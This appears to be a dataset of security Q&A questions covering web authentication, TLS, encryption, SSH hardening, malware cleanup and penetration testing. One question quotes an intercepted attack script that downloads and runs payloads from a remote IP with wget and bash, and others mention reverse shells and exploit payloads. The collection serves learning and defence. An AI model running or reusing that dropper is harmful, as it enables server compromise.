instruction
stringlengths
24
29.9k
I have a two part question here. I have a javascript webapp accessing privileged REST endpoints. I would like to protect against CSRF. Currently, I have a login system built which returns a login cookie containing an encrypted payload (encrypt-then-MAC). I am reasonably sure the cookie contents cannot be tampered with...
I just got hired at this SW tech company with a few IT gurus in it. There is a clever genius that is suspect. He obtained my personal home email address I use. It was obtained from company communication during the hiring process. He some how set up a snooping system that is covertly social engineered in one of the yaho...
According to Wikipedia, the SD card reader recognizes if the little tab on the left of the SD card is in the "lock" position or not. Thus, a SD card reader can still write on the SD card even if the write protection is on by ignoring it. Is it true that the write protection is only a voluntary feature by the card reade...
Anyone know anything about OpenDNS? Is it safe to use, or should it be avoided? If it should be avoided, what are the alternatives? I am basically looking for a way to block certain sites from my home network, but at the same time, I don't want to use a service which isn't safe interms of privacy and freedom.
In order for our business to be PCI compliant, we need to prove that we are not vulnerable to CVE-2007-2243. This states that: OpenSSH 4.6 and earlier, when ChallengeResponseAuthentication is enabled, allows remote attackers to determine the existence of user accounts by attempting to authenticate via S/KEY, which dis...
Is it possible to DOS DNS by creating custom dns zones with lots of text records in them so that the size of the DNS zone is in the order for example 100 Gigabyes, and then query all the dns records from the zone from the internet and thus possibly filling up the disk of dns caching servers? Bind9 has a max-cache-size ...
https://en.wikipedia.org/wiki/DLL_injection My question: When someone is doing a DLL injection does anything gets written to disk? Or the whole attack is just in Memory?
I have inherited an ASP website where sensitive data was passed in the query string as part of the URL. Something like this: www.example.Com/Test?details=Username&moreDetails=blahblah If we change this to encrypt the query string, so Username and moreDetails are not visible, I assume I still have the issue that this e...
I want to find out if shodan uses my ip adresse to query the target after sending this HTTP request: https://api.shodan.io/shodan/host/{target_ip}?key={MY_API_KEY} so is shodan API a passive or active scanning tool ? the same for searching in shodan's home page ?
Can anyone tell me what this means? I'm on Bluehost with a shared server. [ip]71.63.199.72 [url]HNAP1 [size] 134 [status] 401 [method]GET [protocol] HTTP/1.1 [referring url] My server address [ip]71.63.199.72 [url]401 [size] 0 [status] 0 [method]\x80w\x01\x03\x01 [protocol] 162 [referring url] none [ip]141.212.121.10...
I am writing an iOS app which needs to be HIPAA compliant. The app should preferably function offline, so data needs to be stored on the phone. So here is what I was thinking of doing: On First Launch user enters username, password and a pass-phrase. The server authenticates the user using username, password and UDID(A...
I have received an image from a friend. This is the image. is there any way to detect any anomalies in this image. Thanks
One professor from my university proposed me and some colleagues to work on a paper about the digital declaration (which is supposed to be better than the digital signature) for passing the subject. Unfortunately, it doesn't seem to be a well known concept. One of the colleagues has done a search and she has only sent ...
If my PC has NO on-mainboard WLAN and there is NO WLAN-adapter card and NO USB WLAN-stick installed, how sure am I that there is really no WLAN connectivity possible ? I.e. can I really disconnect from the internet today ? Background: Say I wanna really disconnect (most of the time, yes I know I need to update virus s...
I know your time is valuable so I'm not waiting for specific answers to my situation. I don't mind reading documentation, so pointers to something that converges would be greatly appreciated. I don't plan to waste anyone's time.. This is not an urgent matter and I'm doing this to learn (the "site" doesn't serve anythin...
I am hot desking in the same office as a potential competitor & would be using the same wifi. The building owner runs the competitor company. My question is, can the wifi administrator see mail I have sent through outlook (via Google apps) when using my personal machine? Concerned about email content but also the actua...
I have a domain, where some other users have access to upload files, use email, use XMPP, etc. How can I prevent that these users go to a certificate authority and get a certificate for my domain? Unless the CA requires personal contact, how do they technically proof ownership of a domain? (Assuming a somewhat "truste...
Can anyone explain me these terms with respect to OAuth ? Consumer Key Consumer Secret Access Token Access Token Secret Also, when I registered my application with twitter I got the consumer key and consumer secret but how do I get the access token and access token secret ?
It must be possible to detect keylogging by close scrutiny of timing between physical keystroke execution and the character's eventual occurrence on the screen. I've had a friend show me this with his camera. The camera can record at 16,000 frames per second. He recorded himself typing the letter 'a' in program 1, the...
I am using veil framework to bypass av, when i want to choose a payload there are many choices, there is: rev_https_contained python/meterpreter/rev_https c/meterpreter/rev_tcp My question is what is the difference between first two shell codes, and is there any advantages to use https payloads?
I was cleaning my father’s laptop which was recently infected by a fairly tenacious piece of malware. It hasn't given any great clues as to what it is named or anything of that sort and thus far resisted me try most of the techniques. Some of the symptoms of the virus are: Popups while using some Adcash sites. Hijack...
I know, I know - "If P=NP" is a really large, high-impact assumption. But this is a hypothetical. I mean, clearly RSA (and similar methods of obfuscation) would likely become totally irrelevant - or would they? Being solvable in polynomic as opposed to exponential time would be a significant blow to their operation, b...
For the registration on my PHP powered website, I require email confirmation. After a user registers, a string is generated with the following code and sent to their email address. $key = md5(mt_rand(1000,999999).$_POST['email']); That string is also stored in the database, and if the user pastes the correct key in to...
I pay for a very basic web hosting plan, which includes a personal email address. Would the sysadmin of said host be able to read the content of my messages? How likely would my personal mail folder be encrypted and secure from prying eyes nowadays?
It seems that persistent logins are technically the same as storing a password on the client, and therefore should be avoided whenever possible. However, real life users would be unhappy with having to enter their password every time they wanted to access a site that they visit frequently. Given the following assumptio...
I'm looking over some JPEG files with an assumption that a steganography has been used for trial obfuscation due to the installation of JPHS. I've come across a file where the start of scan marker precedes the start of frame. Should this file be further inspected?
I see lots of people claim virus scanners are unnecessary on a linux server. But if this server accepts files uploaded from users (and lets others download them), does it become worth it to scan the files when they are uploaded on the server?
I spoke to a sysadmin in a business center today who intended to basically perform a MiTM (as he called it) on every connection in his network because people in his office building are using VPNs and https connections to stream video, download torrents etc.. These services use up all the bandwidth but because they are ...
I noticed a strangeness in the TLS 1.2 Handshake and I don't know if I'm missing something. As you can see in this screenshot, the browser (Chrome) puts the value 0x0301 as version in the Record Layer but it puts the 0x0303 value as version in the Handshake record. The used version is TLS 1.2 (SSL 3.3) actually. If I ...
I have intercepted an attack on my web server that I believe was unsuccessful. The attacker tried to execute this script: #!/bin/sh cd /tmp;cd /dev/shm wget -q http://221.132.37.26/xx -O ...x chmod +x ...x ./...x cd /dev/shm ; wget 221.132.37.26/ru ; bash ru ; rm -rf ru cd /dev/shm ; wget 221.132.37.26/rr; bash rr; r...
Is it safe to recycle unshredded paper credit card receipts? Can identity theft be helped by data disclosed on most vendor's receipts?
Recently, a large UK shopping chain had the staff payroll database leaked (including bank details, all unencrypted) We've been told that we cannot take legal action and have so far been denied compensation as although our data was stolen, it wasn't an external breach, it was someone internal leaking the data with privi...
I'm uploading files on S3, where the filename is a UUID. All files uploaded are publicly read/write, however these files are considered private to users. Is it possible for someone to guess a UUID, or randomly try a bunch of combinations to access some of these files? Is there a better way to secure S3 files?
X509 certificates used in PKI{X} have notBefore and notAfter dates. I'd like to stamp a certificate with a creation stamp, and the stamp is distinct from notBefore and notAfter. Is there an OID for a creation date/time? I looked through X.520 and did not see a similar OID. The description OID is already being used in t...
Suppose I received a call from internet with some virtual number, I called the same number back after few days but it didn't exist at the time or it was routed to some other user. Is there a way to reach the real person. Can I find out which service used to make these calls and then get that person info somehow?
I have read somewhere that the Data in Air Craft Black Boxes are encrypted using various algorithm and only the manufacturers could gain access to the actual data of the BlackBoxe, Why the data in Aircraft's Black Box is Encrypted anyway ? Here is the source where i read that: http://www.astm.org/SNEWS/OCTOBER_2001/bbo...
Just this week someone has been trying to attack the server of the company where I work. I have noticed that they have been trying to brute force root via ssh. fail2ban is handling that well and I never allowed password logins for root in the first place so that's not really a problem but they have been after our websi...
I have a osx 10.9 machine with a File Vault1 encrypted user partition. I would like to remove the encryption, but I don't remember the "master key" which is the only way to remove encryption on-the-fly without reinstalling everything. Moreover I have physical access user and root password which are same (but not maste...
The purpose of my question is get an better idea about reasonable amount of time the generation of the RSA public/private keypair should take? To be less vague let me specify the question and define I would use these commands to generate the keypair on an laptop running a recent 3.2.xx linux kernel. $ openssl genrsa -o...
There are questions about connecting to an untrusted host via SSH [1] [2], RDP, and with X11 forwarding enabled. What about when connecting via VNC? What risks are there to the client? To be clear: the assumption is that the remote host is under the control of a malicious party and they are actively trying to gain acc...
I notice that Chrome does not execute scrips that are part of the web request, http://vulnerable_site?pageTitle=<script>alert('xss')</script> With such links since the script is as part of the web request, Chrome does not execute the script. Does that prevent all kinds of Reflected XSS attacks with Chrome browser ? Edi...
I'm studying for an exam, that's why I don't need software for that purpose (which is what other questions I found on this topic provide) but an explanation. The concrete questions I'm trying to answer are: How can data securely be delete from a flash drive? What is the difference to deleting securely from a hard disk?...
I was about to reset my Facebook password and got this error: Your new password is too similar to your current password. Please try another password. I assumed that Facebook stores only password hashes, but if so, how can they measure passwords similarity? This should be impossible with good hashing function, right? ...
Does anyone know if there is a current overview (I only found ones from before 2006) which MUAs (mail clients) do support PGP/MIME? I wonder whether there still exist issues like "Outlook Express does not support PGP/MIME" or whether this issue can meanwhile be neglected? Thanks for any pointers... Regards. P.S.: This ...
I believe SSL is decrypted and encrypted from your computer to the receiver right? Well is it possible to use any type of encryption (Stanford crypto lib?) to get a password safely over the net these days? Well bulk password collection ISP side of course... And what if people started a movement thing to get an "Extensi...
First off I'd like to say this is my first post on StackExchange, so please let me know if there's anything wrong with it. Also, I don't know much about networking and I'm just making a simple java application (A packet listener with jnetpcap) to try to learn the basics. I'm using Low Orbit Ion Cannon to flood myself. ...
I have gain access to a server via ftp which is showing me the passwd file with 2 users via ftp://1.2.3.4/../etc/passwd output is: root:*:0:0:root:: ftp:*:109:117:Anonymous FTP:: As such the shadow file is not available and doesn't give the same response changing the url to X/../etc/shadow Is it possible to obtain th...
Is it possible to detect if a message has been tampered with, without using MAC (i.e. shared key) and without using a "trusted" third party (i.e. certificate authority)? I'm pretty sure it's not, but I would just like to be sure. Note: I don't care if the message is read by anyone else, I just don't want them to be abl...
I'm thinking of writing an application that communicates sensitive information (using Python, if that's relevant). Instead of using the standard GUI libraries (like GTK, Qt or wxWidgets), I was thinking of instead making a web interface using something like web.py to run a local server and take input this way. This wo...
Let's say I am following good security policy and picking passwords that are: Long Complex (passphrases where possible, otherwise random strings with special characters) Unique (completely independent for different sites/things) Changed regularly Let's also say that for this particular set of passwords, I do not feel...
I'm redesigning a login screen for a financial services application. Currently, this requests user ID and password, then (on the same screen) 2 digits from a 6-digit PIN are requested - these 2 digits are only revealed when the user ID and password have been entered. Looking around at other financial services provider...
I am pursuing a college project, in which I am running three fake services on three ports to protect the main service (say running at port 80). The concept is that if the user is malicious, he'll try to bring the services down and access the fake services. These ports adopt a blocking process of a connection request an...
Assume this scenario: Someone trying to hack a website. Simply put: www.site.com/example.php?=<script>alert(1)</script> A HIDS would see this attempt in Apache's access log, a NIDS would see this attempt in packet's HTTP section and the WAF in the URL. If all of them are detecting the attack, why are needed all of them...
You may know or probably are using TOR client which provides anonymity to the users but how can one be sure they are secure when browsing using this client and its network since its funded by feds? I have read this article by the Washington Post about TOR and it mentions that the Tor Executive Director Andrew Lewman's...
I'm implementing a Dropbox-like API, and one of my requirements is to have the files stored encrypted on the server. It is not required that the files are made unreadable by the server, only that they aren't stored clear on disk. I'm using Python with Flask for the API part and PyCrypto for the encryption. I know absol...
IP Addresses are pretty common around the internet so they're often easily found in plain text. However, let's say there's a number of IP addresses configured on a server to allow access through a firewall to specific locations. So, 1) these addresses are allowed access to a protected server and 2) someone else owns th...
I am running Kali Linux as a VM on my Windows machine which is NAT'd behind my company network, if I wish to pen test a website for a client and believe that a reverse shell is possible, what is a good way of achieving the connection? Note that I am not asking how to execute the exploit or inject the shellcode, but I a...
I'm planning a service that will require allowing users to run arbitrary JVM code on a server. I'm planning to sandbox the code, but I know that the JVM has traditionally had security holes, which is why I want to explore other avenues. There are already services such as Travis CI which allow anyone to run any code on ...
I've tried running Qualys' ssltest a few times and it keeps complaining that PFS isn't supported in some browsers. On their blog, they suggest a configuration for Apache 2.4 that should get an "A" grade in their ssltest, but the configuration [predictably] doesn't earn an "A" in Apache 2.2. Does anybody know if it's p...
Sorry if this is a very amateur question. I was checking out some article regarding CAPTCHA bypassing. And I though this article seemed interesting http://blog.opensecurityresearch.com/2012/08/bypassing-captchas-by-impersonating.html Now, this attack redirects the request from the Server(which is the client for the C...
Sometimes when I visit a website using HTTPS, I get a warning sign next to the URL in my browser (see screenshot; look for yellow/orange arrow) and I wonder if this marks a potential threat or an attack: The browser gives the reason "This website does not provide information about its owner" (I actually get this in Ge...
I'm working on an email client for Windows, and to send emails, my application needs to have the email address and the password of that email address. When the user gives his password, I store it encrypted. When sending an email, I pass the decrypted password. But there is one problem here: if I just encrypt a password...
Recently, We developed an application that we want it's users to pay for a monthly subscription in order to use it. So the first thing that came to our minds how to implement a secure way for our application to check for the User validity and those ideas came up Using WebClient to enter to our website and log in using...
I'm implementing a REST API and I've generated 128-bit random API keys which are used with HMAC-SHA1 for authorization. Should I hash the secret key on both the client and server before using it, maybe with SHA1 or bcrypt? This would avoid storing the secret key in plaintext. However I've been having trouble finding ot...
I see some strange (suspicious?) http requests in my webserver. Example: 192.161.x.x - - [14/Mar/2014:21:55:36 -0300] "GET /ce/c02i.html/RS=^ADAD3F3nOTvuESWLtAiP39aTQZiSRQ- HTTP/1.0" 404 881 "http://example.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537...
I have to read http/https messages sent from a client system and see that the messages are not being modified within system by any malware and the server receives what exactly the user wants to send. For Example, a User in an online Banking Transaction wants to send Amount $100 to Account 'A' and lets say that the mes...
A developer managed to open a console application with NT Authority/System rights at the startup screen before logging in. From that command prompt it is possible to execute arbitrary programs like Notepad, Internet Explorer and even Explorer to get a start menu. With those local System rights, is it easy to acquire do...
I have to read http/https messages sent from a client system and see that the messages are not being modified within system by any malware and the server receives what exactly the user wants to send. For Example, a User in an online Banking Transaction wants to send Amount $100 to Account 'A' and lets say that the mess...
Considering the classic scenario of Eve trying to listen in to Alice and Bob's conversation, if Eve can intercept messages between Alice and Bob but with no access to their computers would Timing attacks be possible? Am I right in saying it isnt possible because say Alice sends a message to Bob how will Eve listen in t...
We have a public ftp server that is being probed by the usual Chinese brute-force scans. They are probing vsftpd. Notmally a failed login to vsftpd looks like this in syslog: Mar 17 15:56:07 cache0001 vsftpd: ftp_set_login_id - unable to esd_decode: root Mar 17 15:56:07 cache0001 vsftpd: ftp_authenticate failed - inva...
I have the following situation and want to know what are the best practices to do such things without exposing myself to security issues I have two servers both use the same private key for login. Server 2 copies files to Server 1 via scp (currently I save the private key on Server 2) If any hacker ever gets control...
With today's technology, is it possible to locate a cellphone's location just by ringing it, kind of like what we see in movies?
I am trying to perform a simple penetration test on the DVWA (the web application that has been specifically designed to be vulnerable to some of the most common web application attacks). I want to use ModSecurity WAF to protect this web application from SQL Injection attacks. I am using Apache web server to host my we...
I need to embed a unique ID hash string in many types of files, and then verify the hash string inside the files later on remotely. Is there a best practice for doing this?
I've created a C# program that encrypts and decrypts a file. The encryption method is DES. The program is exactly the same as in the following link, except that the part that removes the key from memory has been commented out: How to encrypt and decrypt a file by using Visual C# My question is, after running the progra...
Is there a way to trigger alarms in an Intrusion Detection System with something similar to the EICAR test virus? Maybe some special packet that is harmless to the environement, but will trigger IDS? I am asking this in the context of a SE rogue device dropping senario, where the device trys different tunneling protoco...
You probably know that even when you use a VPN service, browsers like Chrome and Safari can still somehow provide your real location to Google Maps etc (if you give it a permission). My question is: how to hide my real IP from the browsers? Maybe some additional security software can be used to achieve it?
I have looked for the answer to this question to no avail, apologies if I missed it. I would like to know how effective iptables would be against MitM attacks - in the following setup: ALLOW INPUT {only one IP address} DROP All Else Anywhere I guess what I am asking is, would it still be possible for someone to masq...
There are very few websites that hash the users password before submitting it to the server. Javascript doesn't even have support for SHA or other algorithms. But I can think of quite a few advantages, like protection against cross-site leaks or malicious admins, which SSL does not provide. So why is this practise so u...
If I got an SSL certificate for my website and use an SSL secured connection (HTTPS), is this safe enough to send my login and password data or should I add some encryption or hashing? And how safe is SSL against Man In The Middle attacks? Can they grab or even modify the data sent and received over HTTPS? And what abo...
Background: I have little knowledge of hashing and encryption, so please bear with me. I have posted a related question here: https://softwareengineering.stackexchange.com/questions/232261/options-for-client-side-encryption-of-local-web-databases for the programming perspective, which may give some background. That qu...
From my understanding of Intel TXT, the technology can be used to put the processor in a trusted state where measurements can be performed. My understanding looks something like this, where I believe TBoot is typically used to launch SINIT. However such that SINIT is not called and the OS is brought up in a miscellan...
I have a C++ application with an algorithm, whose usage I want to protect. The application needs several input data files to work (those may change for each client). My goal is to allow only unaltered input data files which were registered for use. My current thoughts are: The client has the input files as text Calcul...
I have a login system created in PHP. It currently doesn't have the "forgot password" feature and I would like to implement the feature. For this I'm planning to do the following: When user submits the form with email on "forgot password" page, an email with a unique token of 50 characters is sent. The unique key gene...
We have many Linux servers in several co-locations over the world. By design, these machines generally should not be able to access the Internet. Depending on location and role, some sites may have very limited Internet access (e.g. default deny with one or two sites white listed). So depending on the circumstances,...
I'm currently studying the A5/1 algorithm used for GSM encryption. I understood how thanks to the symmetric private Key and a public counter frame one can encrypt the communication between A and B. However, what I don't really understand is how the symmetric private key K is managed ? If A wants to communicate with B. ...
I am developing a script to perform an a buffer overflow for an assignment in school. However, I am stuck at a point where my payload works injected through the commandline, but not injected through my python script. When I inject my payload from the commandline: user@ubuntu:~/Documents/$ /home/user/Documents/easy $(...
Assuming I have a server/client topology, currently I'm facing the problem that I want to generate some key on the client side and somehow make the remote server get it securely. I'm using AES on both parts, so basically what I need is to generate a random IV and a random secret key, but how to share it with the serve...
I am using Explorer as my browser. What do I have to have on regarding the TLS and SSL protocols. There are several of each one.
I'm reading this pki article and as you can see near the bottom, the quick animation and description: The sending computer encrypts the document with a symmetric key, then encrypts the symmetric key with the public key of the receiving computer. The receiving computer uses its private key to decode the symmetric key. ...
Is it possible that a neighbour could see my traffic (*), when we both have cable Internet? Or: Under which conditions might this be possible? I would assume, "Never!", but after reading these two answers, I’m unsure. At the Server Fault question ISP broadcasting all IP-packets, so I can see traffic of other clients fr...
An answer to this question says Facebook generates a bunch of password guesses to see if they hash the same as a previous version of the password. Why bother? If a service forces every password to have sufficient length and complexity, why should it care if the changed password is similar to the previous password, sin...
128-bit entropy is required http://nxtra.org/nxt-client/js/passphrasegenerator.js With all new browsers (Chrome, Firefox, IE 11) it uses crypto.getRandomValues which should be safe, but with IE 10 (and older) it uses random mouse input from the user combined with Math.random $("html").on("mousemove", function(e) { ...
right now I'm thinking about how to secure some data inside an Application... Now i have the following problem: Is it possible to generate the passpharase from a decrypted message and the same message encrypted with AES and the passpharse? Example: The decrypted message is : "Hello" The passpharse is: "you" And the enc...
Using the following files, I have attempted to restrict the SSH remote login. Having lack of knowledge in linux environment, I don't know the drawbacks and vulnerabilities between the following ways. So I want to know the internal works between these files and process. Experts please share your experience with me. SSHD...
I am new to mainframe security testing practice. So far I have read a few articles on that even security of mainframe can be compromised. I would like to know if there are any such checklists that the security tester follow while testing a mainframe application.
I recently had a situation where I lost an old private key (write error; realized this too late). In regenerating keys and replacing the public keys on various sites, I noticed that the public keys were identical. I did use the same key size, algorithms, and passphrases as the older set, but I thought that there was su...
The UK is getting a new £1 coin. Its designers, the Royal Mint, claim that unlike current coins, it includes built in technology for high speed authentication and verification everywhere from ATMs to vending machines and point-of-sale. How does this work? Something like RFID? Does this mean the coins (and therefore ...
What are the problems that Chip card technology solve? and what are the problems EMV solve? I understand that EMV is a standard where as chip card is a technology, It's pretty hard to tell them apart (can we refer to EMV & Chip Card as the same thing?) What are the problems that having a chipcard or an EMV standard c...
I know many banks using Windows XP on almost computers for staff working, WinXP has many security vulnerabilities. But rarely seriously problems occured with thier system. Is there good Firewall and IPS Solutions was seperated thier system from outside? Any kind of attacks in real time could be affected this systems? T...